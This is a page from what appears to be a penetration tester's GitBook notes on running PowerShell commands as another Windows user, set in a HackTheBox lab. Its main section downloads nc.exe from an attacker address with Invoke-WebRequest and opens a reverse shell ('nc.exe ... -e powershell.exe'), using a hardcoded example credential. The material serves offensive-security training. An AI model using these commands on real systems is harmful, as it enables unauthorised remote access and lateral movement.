Notes
  • Enumeration
  • Shells
    • Interactive TTY Shell
    • Spawn a Shell
    • Reverse Shells
  • Buffer OverFlow
    • Do Stack Buffer Overflow Good
    • Server-Memc.exe
  • Tools
    • hydra
    • Hashcat
    • SSH tricks
    • Git
    • pspy
    • Impacket-tools
    • Evil-winrm
    • Crackmapexec
    • Empire
    • SQLMap
    • msfvenon
    • Mimikatz
    • Docker
    • Weevely
    • gpp-decrypt
    • PLink.exe
    • john
    • wfuzz
    • Searchsploit
  • Python
    • Useful Libraries
    • Python Tricks
    • Using fstrings Python3
  • PHP
    • Web shells
    • Bypassing Dangerous PHP Functions
    • Exploiting RFI in a PHP application and bypassing remote URL inclusion restrict
    • PHP - LFI and RFI
  • SQL Injection
    • Getting a Shell
    • Enable xp_cmdshell
    • Shell From PHPMyAdmin
  • OpenSSL - CheatSheet
  • Windows
    • TeamViewer Decrypt
    • Commando VM
    • PrivEsc
      • Bypass AppLocker
      • Disable Windows Defender
      • Abusing Services
      • Blogs About Windows
      • Guides
      • Powershell Runas
      • Living Off The Land Binaries and Scripts
      • DLL Injection
      • Common Windows PrivEsc
      • Windows PrivEsc Exploits
      • Abusing Files Permissions
      • Interesting Files
      • File Transfer Methods
      • Bloodhound
      • Potatos and Tokens
        • PrintSpoofer Win10 - Server 2016/2019
      • SessionGopher.ps1
      • Sherlock.ps1
      • Windows - PrivEsc Scripts
        • Windows Exploit Suggester
    • Powershell
    • Anti-Virus Evasion
    • Post-Exploitation
      • Extract Windows Hashes Offline
      • Dumping Domain Password Hashes
    • Vulnerabilities
      • MS15-051
      • MS17-010
      • MS08-067
    • Active Directory
      • Get-DomainSPN Ticket
      • Kerberos
      • Bloodhound
      • DNS Admin to SYSTEM
      • DC Sync Attack
      • Escalating privileges with ACLs in Active Directory
      • How SMB Relay Works
      • Practical Guide to NTLM Relaying
      • Microsoft Exchange – ACL
  • Linux
    • PrivEsc
      • LXE to root
      • MySQL as root
      • Logrotate PrivEsc 3.15.1
      • Guides
      • SSH Tricks
      • Abusing Unix Wildcards
      • Linux - PrivEsc Scripts
    • Kernel Exploits
  • OSCP
    • Resources & Guides
      • WordPress PrivEsc
    • HackTheBox - Writeups
      • HTB - Networked
      • HTB - Cronos
      • HTB - Nibbles
      • HTB - LaCasaDePapel
      • HTB - Sense
      • HTB - October
      • HTB - Brainfuck
      • HTB - Mirai
      • HTB - Blocky
      • HTB - Teacher
      • HTB - Tally
      • HTB - Bank
      • HTB - Jeeves
      • HTB - Silo
      • HTB - Bastard
      • HTB - Legacy
      • HTB - Heist
      • HTB - Active
      • HTB - Bastion
      • HTB - Haystack
      • HTB - Bashed
      • HTB - Blue
      • HTB - Tenten
      • HTB - Artic
      • HTB - Bounty
      • HTB - Jerry
  • CTF
    • TryHackMe Writeups
      • TryHackMe - Tempus Fugit Durius
      • TryHackMe - Jack
    • Tools and Resources
Powered by GitBook
On this page
  1. Windows
  2. PrivEsc

Powershell Runas

This is how to execute commands as a different user in Powershell. (similar to runas)

$Username = 'BOXNAME\user1'
$Password = 'sup3rs3cr3t123'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass  
Invoke-Command -Computer BOXNAME -ScriptBlock { whoami }  -Credential $Cred

To get a reverse shell with a different user.

# Use python to share the file
python3 -m http.server 80

# Use powershell to download the file. In this case nc.exe
Invoke-Command -Computer SNIPER -ScriptBlock { IWR -uri 10.10.14.20/nc.exe -outfile nc.exe }  -Credential $Cred 

# Revser shell with powershell 
Invoke-Command -Computer SNIPER -ScriptBlock { cmd /c nc.exe 10.10.14.20 9002 -e powershell.exe }  -Credential $Cred

Another way of doing it.

Start-Process powershell -Credential domain\differentUserName -ArgumentList '-noprofile -command &{Start-Process "TheApp.exe" -verb runas}'
PreviousGuidesNextLiving Off The Land Binaries and Scripts

Last updated 5 years ago